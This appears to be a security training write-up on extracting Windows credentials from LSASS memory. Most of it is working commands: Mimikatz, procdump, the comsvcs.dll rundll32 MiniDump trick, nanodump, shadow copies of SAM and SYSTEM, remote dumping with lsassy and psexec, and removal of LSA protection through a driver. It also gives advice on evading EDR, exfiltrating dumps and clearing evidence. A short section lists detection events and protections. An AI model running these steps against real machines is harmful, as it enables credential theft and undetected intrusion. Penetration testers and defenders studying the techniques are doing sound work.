LSASS Dumping Techniques

intermediate30 minWriteup

Various methods to extract credentials from LSASS

Learning Objectives

  • Understand LSASS protection
  • Use various dumping tools
  • Evade credential dump detection
  • Process dump files offline

LSASS (Local Security Authority Subsystem Service) is where Windows keeps your secrets. Passwords, hashes, tickets - it's all in LSASS memory. Dumping LSASS is how

extracts credentials. But Mimikatz is heavily detected - let's explore all the ways to get at that juicy memory.

Think of LSASS as the security guard who knows everyone's secret password. The guard needs to remember them to let people in, but if you can "read the guard's mind" (dump memory), you learn all the secrets.

Detection Focus

LSASS access is heavily monitored. EDR, AV, and Windows Defender all watch for it. Modern attacks focus on living-off-the-land binaries (LOLBins) and memory forensics evasion.

What's in LSASS?

1LSASS Memory Contains:
2├── NTLM hashes
3│   └── For any user who logged in interactively
4├── Kerberos tickets (TGT and TGS)
5│   └── For any user with active sessions
6├── Kerberos encryption keys
7│   └── Used for ticket operations
8├── Plaintext passwords (sometimes!)
9│   └── If WDigest enabled or old systems
10├── Cached credentials
11│   └── Domain cached credentials (DCC2)
12└── Various SSP credentials
13    └── TSPKG, LiveSSP, etc.
14 
15Not in LSASS:
16├── SAM database (use lsadump::sam)
17├── NTDS.dit (on DC, use DCSync)
18└── Credentials for users who haven't logged in

Direct LSASS Access

Mimikatz (Classic)

1606070;"># Direct LSASS access
2privilege::debug
3sekurlsa::logonpasswords
4 
5606070;"># Heavily detected - rarely works on protected systems

pypykatz (Python)

bash
1606070;"># Live LSASS (requires admin on Windows)
2pypykatz live lsa
3 
4606070;"># Better: Parse dump file (offline analysis)
5pypykatz lsa minidump lsass.dmp

LSASS Dump Methods

Task Manager (GUI)

1606070;"># Simplest method - might work when tools don't!
2 
31. Open Task Manager as Administrator
42. Go to 606070;">#a5d6ff;">"Details" tab
53. Find lsass.exe
64. Right-click → 606070;">#a5d6ff;">"Create dump file"
75. Dump saved to %TEMP%lsass.DMP
8 
9606070;"># Surprisingly effective on some EDR-protected systems
10606070;"># GUI actions are less monitored than CLI tools

ProcDump (Sysinternals)

powershell
1606070;"># Microsoft-signed tool = more trusted
2procdump.exe -accepteula -ma lsass.exe lsass.dmp
3 
4606070;"># Evasion: Use PID instead of name
5$pid = (Get-Process lsass).Id
6procdump.exe -accepteula -ma $pid lsass.dmp
7 
8606070;"># Silent mode
9procdump.exe -accepteula -ma -r lsass.exe lsass.dmp
10 
11606070;"># Some EDR still catches this based on behavior

comsvcs.dll (LOLBin)

powershell
1606070;"># Living-off-the-land - no external tools!
2606070;"># Uses built-in Windows DLL
3 
4606070;"># Find LSASS PID
5$pid = (Get-Process lsass).Id
6 
7606070;"># Method 1: rundll32
8rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $pid C:\temp\lsass.dmp full
9 
10606070;"># Method 2: From cmd
11for /f 606070;">#a5d6ff;">"tokens=2" %a in ('tasklist ^| findstr lsass') do rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump %a lsass.dmp full
12 
13606070;"># Note: Requires SeDebugPrivilege (admin)

MiniDumpWriteDump API

powershell
1606070;"># PowerShell using Windows API
2$processId = (Get-Process lsass).Id
3$dumpPath = 606070;">#a5d6ff;">"C:\temp\lsass.dmp"
4 
5606070;"># Load dbghelp.dll
6$signature = @"
7[DllImport(606070;">#a5d6ff;">"dbghelp.dll", SetLastError = true)]
8public static extern bool MiniDumpWriteDump(
9    IntPtr hProcess,
10    uint ProcessId,
11    IntPtr hFile,
12    uint DumpType,
13    IntPtr ExceptionParam,
14    IntPtr UserStreamParam,
15    IntPtr CallbackParam
16);
17"@
18Add-Type -MemberDefinition $signature -Name 606070;">#a5d6ff;">"DbgHelp" -Namespace "Win32"
19 
20606070;"># Open process and create dump
21606070;"># (Full implementation requires more code)

nanodump

1606070;"># Stealthier LSASS dumping tool
2606070;"># Uses syscalls to avoid API hooking
3 
4nanodump.exe --write C:\temp\lsass.dmp
5 
6606070;"># Options:
7606070;"># --fork: Fork LSASS before dumping (avoids some detection)
8606070;"># --shtinkering: Use syscalls
9606070;"># --duplicate: Duplicate LSASS handle instead of opening
10 
11606070;"># Outputs custom format - parse with nanodump's parser or pypykatz

SafetyKatz

1606070;"># Dumps LSASS and runs Mimikatz in memory
2606070;"># Automated dump + parse
3 
4SafetyKatz.exe
5 
6606070;"># Or from Cobalt Strike
7execute-assembly SafetyKatz.exe

Dump First, Parse Later

On heavily monitored systems, dump LSASS to a file, exfiltrate it, and parse offline. Running Mimikatz live is more detectable than just creating a dump file.

Parsing Dump Files

bash
1606070;"># Mimikatz (Windows)
2sekurlsa::minidump lsass.dmp
3sekurlsa::logonpasswords
4 
5606070;"># pypykatz (Python - works on Linux!)
6pypykatz lsa minidump lsass.dmp
7 
8606070;"># Output to file
9pypykatz lsa minidump lsass.dmp -o creds.txt
10 
11606070;"># mimipenguin for specific parsing
12python3 mimipenguin.py lsass.dmp

Shadow Copy Method

powershell
1606070;"># Create shadow copy and copy SAM/SYSTEM/SECURITY
2606070;"># Avoids file locks and some detection
3 
4606070;"># Create shadow copy
5vssadmin create shadow /for=C:
6 
7606070;"># Copy files from shadow
8copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
9copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
10copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\temp\SECURITY
11 
12606070;"># Delete shadow copy (cleanup)
13vssadmin delete shadows /shadow={SHADOW_ID} /quiet
14 
15606070;"># Parse offline
16secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Remote LSASS Dumping

bash
1606070;"># CrackMapExec - dump remotely
2crackmapexec smb target -u admin -p password -M lsassy
3 
4606070;"># lsassy (specialized tool)
5lsassy -u admin -p password -d corp.local target
6 
7606070;"># Impacket secretsdump (gets some creds but not full LSASS)
8secretsdump.py corp.local/admin:password@target
9 
10606070;"># Remote procdump execution
11psexec.py corp.local/admin:password@target 606070;">#a5d6ff;">'procdump -accepteula -ma lsass.exe C:\temp\lsass.dmp'
12606070;"># Then download the dump

LSASS Protections

1LSA Protection (RunAsPPL):
2├── LSASS runs as Protected Process Light
3├── Only signed code can interact
4├── Check: reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
5├── Bypass: Vulnerable drivers, mimidrv.sys, PPLdump
6└── Enable: Set RunAsPPL DWORD to 1
7 
8Credential Guard:
9├── Virtualizes LSASS in secure container
10├── Even SYSTEM can't access virtualized creds
11├── Check: Get-ComputerInfo | select DeviceGuardSecurityServicesRunning
12├── Bypass: Very difficult - usually need kernel exploit
13└── Enable: Via Group Policy or WDAG config
14 
15Windows Defender Credential Guard:
16├── Full virtualization-based protection
17├── Requires Secure Boot, TPM 2.0, UEFI
18└── Extremely effective when properly configured

Bypassing LSA Protection

1606070;"># mimidrv.sys (Mimikatz driver)
2!+                          606070;"># Load driver
3!processprotect /process:lsass.exe /remove   606070;"># Remove protection
4sekurlsa::logonpasswords    606070;"># Now works
5!-                          606070;"># Unload driver
6 
7606070;"># PPLdump
8PPLdump.exe lsass.exe lsass.dmp
9 
10606070;"># These require admin and often trigger alerts
11606070;"># EDR typically blocks driver loading

Detection & Evasion

1Detection Methods:
2├── Sysmon Event ID 10 - Process Access to LSASS
3│   └── TargetImage contains lsass.exe
4├── Sysmon Event ID 1 - Process creation
5│   └── Known dump tools (procdump, etc.)
6├── Sysmon Event ID 7 - Image loaded
7│   └── comsvcs.dll, dbghelp.dll loading
8├── Windows Security Event 4656/4663
9│   └── Object access to LSASS process
10├── EDR behavioral detection
11│   └── OpenProcess on LSASS with VM_READ
12└── AMSI for PowerShell-based methods
13 
14Evasion Techniques:
15├── Use Microsoft-signed tools (procdump)
16├── Fork LSASS process before dumping
17├── Use direct syscalls (avoid API hooks)
18├── Dump via GUI (Task Manager)
19├── Dump on DC and exfil (different detection)
20├── Use memory-only techniques
21└── Time-of-day (dump during high activity)

LSASS Dumping Methodology

LSASS Attack Flow

1
Check ProtectionsLSA Protection? Credential Guard?
2
Choose MethodTask Manager → ProcDump → comsvcs.dll → nanodump
3
Create DumpExecute chosen dumping method
4
ExfiltrateCopy dump file to analysis machine
5
ParseUse Mimikatz or pypykatz to extract creds
6
CleanupRemove dump file, clear evidence

Knowledge Check

Quick Quiz
Question 1 of 3

What's the advantage of dumping LSASS to a file instead of running Mimikatz directly?

Challenges

Dump Without Tools

Challenge
🔥 intermediate

On a Windows machine with admin access but no external tools, dump LSASS memory using only built-in Windows functionality.

Need a hint? (4 available)

Key Takeaways

  • LSASS contains passwords, hashes, and Kerberos tickets
  • Task Manager dump is surprisingly effective
  • comsvcs.dll MiniDump is a LOLBin alternative
  • Dump and parse offline to avoid detection
  • LSA Protection makes dumping harder but not impossible
  • Credential Guard virtualizes and truly protects credentials